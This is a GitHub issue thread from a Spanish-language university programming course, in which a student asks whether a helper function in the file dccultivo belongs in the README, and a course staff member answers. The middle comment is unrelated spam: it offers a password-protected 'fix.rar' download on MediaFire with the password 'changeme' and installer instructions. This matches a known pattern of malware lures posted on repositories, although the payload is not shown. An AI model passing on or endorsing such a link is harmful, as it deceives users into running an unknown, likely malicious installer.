### ISSUE TITLE
README

### ISSUE THREAD

**Issue by martinpint** [IIC2233/Syllabus#191]
### Prerrequisitos
(Marcar colocando una `X` entre los corchetes los ítems que ya hiciste, así: `"[X]"`)

* [X] Leí las reglas del foro (https://github.com/IIC2233/Syllabus/wiki/3.-Reglas-del-foro-(issues)).
* [X] Revisé el compilado de dudas de la tarea y no encontré una *issue* similar a la mía ([click aquí para ir al compilado](/IIC2233/Syllabus/issues/11)).
* [X] Mi duda no se trata sobre una librería o *built-in*, ya que eso se pregunta en la *issue* creada para ello ([click aquí para ir a esa _issue_](/IIC2233/Syllabus/issues/10)).
* [X] De ser necesario, colocaré código simple que permita explicar mi problema o duda, ya que compartir código de esta evaluación puede ser considerado una falta a la ética.

### Duda

Holaa, si es que yo cree una función independiente dentro del archivo dccultivo, pero fuera de ambas clases, ¿tengo que incorporar esa función al momento de redactar el README? y si es que sí hay que hacerlo, ¿En qué apartado debe ir mencionado?

**Comment by MinecraftEarthVillage** [comment]
Download 
https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by vgalfaro** [comment]
Hola! puedes explicar su fin cuando menciones el archivo dccultivo.py, ya sea en modularización o en librerías propias, recuerda que puedes personalizar el readme, el que se sube es solo una guía :) saludos.
